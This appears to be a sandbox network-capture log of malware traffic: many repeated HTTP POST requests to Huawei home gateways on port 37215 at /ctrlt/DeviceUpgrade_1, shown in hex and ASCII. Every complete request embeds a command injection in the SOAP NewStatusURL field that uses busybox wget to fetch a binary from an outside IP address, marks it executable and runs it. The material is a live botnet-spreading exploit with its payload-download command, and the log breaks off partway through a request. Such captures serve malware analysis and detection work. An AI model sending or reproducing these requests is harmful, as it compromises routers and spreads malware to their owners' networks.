                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2134192.168.2.154395841.10.102.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670228004 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2135192.168.2.154712241.183.178.5537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670262098 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2136192.168.2.155076241.68.83.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670263052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2137192.168.2.155400441.25.99.18637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670288086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2138192.168.2.154700241.109.63.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670304060 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2139192.168.2.156050041.235.133.10037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670341969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2140192.168.2.154076241.50.46.4637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670361996 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2141192.168.2.155706641.161.218.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670383930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2142192.168.2.154962241.139.195.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670419931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2143192.168.2.155507441.219.45.23637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670443058 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
